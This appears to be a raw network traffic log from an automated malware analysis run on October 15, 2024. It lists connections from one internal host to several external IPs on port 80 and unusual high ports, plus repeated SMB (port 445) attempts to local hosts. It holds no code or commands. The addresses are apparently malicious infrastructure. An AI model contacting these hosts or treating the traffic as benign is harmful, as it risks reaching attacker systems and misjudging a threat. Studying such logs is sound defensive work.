                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.202105045 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207514048 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207623005 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207746029 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.207761049 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.208031893 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.208179951 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.208179951 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.208256006 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.218370914 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.306066036 CEST8049902162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.620203018 CEST49900445192.168.11.30192.168.11.14
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.807703018 CEST4990280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.010415077 CEST8049902162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.233128071 CEST4990580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.361496925 CEST8049905172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.361843109 CEST4990580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.365048885 CEST4990580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.493330956 CEST8049905172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.505347967 CEST8049905172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.506426096 CEST8049905172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.506676912 CEST4990580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.519556046 CEST4990580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.526294947 CEST4990280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.604744911 CEST49906445192.168.11.30192.168.11.15
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.728204966 CEST8049902162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.619858980 CEST49906445192.168.11.30192.168.11.15
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.675721884 CEST4990819742192.168.11.3078.63.102.38
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.672919989 CEST4990980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.682037115 CEST4990819742192.168.11.3078.63.102.38
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.801563025 CEST8049909172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.801887989 CEST4990980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.806879997 CEST4990980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.934912920 CEST8049909172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.950052977 CEST8049909172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.950367928 CEST8049909172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.950609922 CEST4990980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.965195894 CEST4990980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.634937048 CEST49906445192.168.11.30192.168.11.15
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.418355942 CEST4991180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.632318020 CEST8049911162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.697174072 CEST4990819742192.168.11.3078.63.102.38
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.998012066 CEST4991380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.126249075 CEST8049913172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.127402067 CEST4991380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.130750895 CEST4991380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.134577990 CEST4991180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.259711981 CEST8049913172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.271306992 CEST8049913172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.271811962 CEST8049913172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.272161007 CEST4991380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.293090105 CEST4991380192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.348771095 CEST8049911162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:33.853199959 CEST4991180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.067285061 CEST8049911162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.309485912 CEST4991480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.437915087 CEST8049914172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.438175917 CEST4991480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.442751884 CEST4991480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.571085930 CEST8049914172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.571763992 CEST4991180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.592084885 CEST8049914172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.592530966 CEST8049914172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.592839003 CEST4991480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.610987902 CEST4991480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:34.785897970 CEST8049911162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.290355921 CEST4991180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.504271030 CEST8049911162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.622271061 CEST4991580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.751477957 CEST8049915104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.751744032 CEST4991580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.754916906 CEST4991580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.884186029 CEST8049915104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.898957968 CEST8049915104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.899029016 CEST8049915104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.899228096 CEST4991580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.913707972 CEST4991580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.062464952 CEST4991980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.190438986 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.190711021 CEST4991980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.194983959 CEST4991980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.323251009 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335241079 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335702896 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335825920 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335880995 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335891962 CEST8049919104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.335973024 CEST4991980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.336169004 CEST4991980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.354125023 CEST4991980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.957122087 CEST4992080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:39.159008980 CEST8049920162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:39.664392948 CEST4992080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:39.866513968 CEST8049920162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:40.382961035 CEST4992080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:40.584851980 CEST8049920162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.085908890 CEST4992080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.287631035 CEST8049920162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.403923035 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.532449961 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.532710075 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.536031961 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.663927078 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681519985 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681618929 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681668043 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681732893 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.681987047 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.682049036 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.682761908 CEST8049924104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.683053017 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.694792986 CEST4992480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.788882017 CEST4992080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.994664907 CEST8049920162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.293477058 CEST4992780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.422486067 CEST8049927172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.422749996 CEST4992780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.426250935 CEST4992780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.554603100 CEST8049927172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.570031881 CEST8049927172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.573508978 CEST8049927172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.573656082 CEST4992780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.585114002 CEST4992780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.924237013 CEST4993080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:46.128209114 CEST8049930162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:46.631525993 CEST4993080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:46.833122969 CEST8049930162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.010205030 CEST4993280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.140970945 CEST8049932104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.141237020 CEST4993280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.146018982 CEST4993280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.274697065 CEST8049932104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.292885065 CEST8049932104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.294234037 CEST8049932104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.294589043 CEST4993280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.309297085 CEST4993280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.334448099 CEST4993080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:47.536256075 CEST8049930162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:48.037470102 CEST4993080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:48.239356041 CEST8049930162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:48.740437984 CEST4993080192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:48.942332983 CEST8049930162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.353879929 CEST4993780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.481920958 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.482215881 CEST4993780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.485524893 CEST4993780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.648899078 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649286985 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649399996 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649415016 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649532080 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649545908 CEST8049937104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.649816036 CEST4993780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.662672997 CEST4993780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.539177895 CEST4994180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.668402910 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.668715954 CEST4994180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.671242952 CEST4994180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.799982071 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821479082 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821572065 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821587086 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821599007 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821680069 CEST8049941104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.821856022 CEST4994180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.824141026 CEST4994180192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.991347075 CEST4994580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.119956970 CEST8049945172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.120141029 CEST4994580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.122663021 CEST4994580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.250916004 CEST8049945172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.265491962 CEST8049945172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.267409086 CEST8049945172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.267600060 CEST4994580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.268260956 CEST4994580192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.234954119 CEST4995280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.437025070 CEST8049952162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.940395117 CEST4995280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.143452883 CEST8049952162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.614875078 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.658982038 CEST4995280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.743704081 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.743835926 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.746777058 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.861299992 CEST8049952162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.875401974 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.891834021 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.891918898 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.891963959 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.892040014 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.892129898 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.892340899 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.892838001 CEST8049954104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.893058062 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:03.894483089 CEST4995480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:04.361931086 CEST4995280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:04.563994884 CEST8049952162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.064825058 CEST4995280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.111841917 CEST4995713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.267358065 CEST8049952162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.440139055 CEST1391849957114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.955301046 CEST4995713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.282886982 CEST1391849957114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.783267021 CEST4995713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.110690117 CEST1391849957114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.192208052 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.320517063 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.320739985 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.323862076 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.452347994 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467257977 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467370033 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467385054 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467396975 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467550039 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467583895 CEST8049959104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467597961 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.467816114 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.470329046 CEST4995980192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.611141920 CEST4995713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.937525034 CEST1391849957114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.439136982 CEST4995713918192.168.11.30114.25.71.193
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.765667915 CEST1391849957114.25.71.193192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.813121080 CEST4996180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.876389027 CEST4996240089192.168.11.3089.215.35.152
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:10.027199984 CEST8049961162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:10.532490015 CEST4996180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:10.746274948 CEST8049961162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:10.891590118 CEST4996240089192.168.11.3089.215.35.152
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:11.250894070 CEST4996180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:11.464401007 CEST8049961162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:11.969544888 CEST4996180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:12.183643103 CEST8049961162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:12.688220024 CEST4996180192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:12.901807070 CEST8049961162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:12.906877995 CEST4996240089192.168.11.3089.215.35.152
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.443964958 CEST4996680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.646018028 CEST8049966162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:19.155430079 CEST4996680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:19.357959986 CEST8049966162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:19.858392000 CEST4996680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:20.060724974 CEST8049966162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:20.576951981 CEST4996680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:20.779465914 CEST8049966162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.279953003 CEST4996680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.482492924 CEST8049966162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.155035973 CEST4996829925192.168.11.3085.217.219.168
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.170075893 CEST4996829925192.168.11.3085.217.219.168
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.313538074 CEST4996980192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.514561892 CEST8049969162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:24.029301882 CEST4996980192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:24.231836081 CEST8049969162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:24.732232094 CEST4996980192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:24.934084892 CEST8049969162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:25.185353041 CEST4996829925192.168.11.3085.217.219.168
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:25.435211897 CEST4996980192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:25.636723042 CEST8049969162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.138214111 CEST4996980192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.339251041 CEST8049969162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:40.414622068 CEST4945553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:40.543474913 CEST53494551.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:58.442030907 CEST5845553192.168.11.301.1.1.1
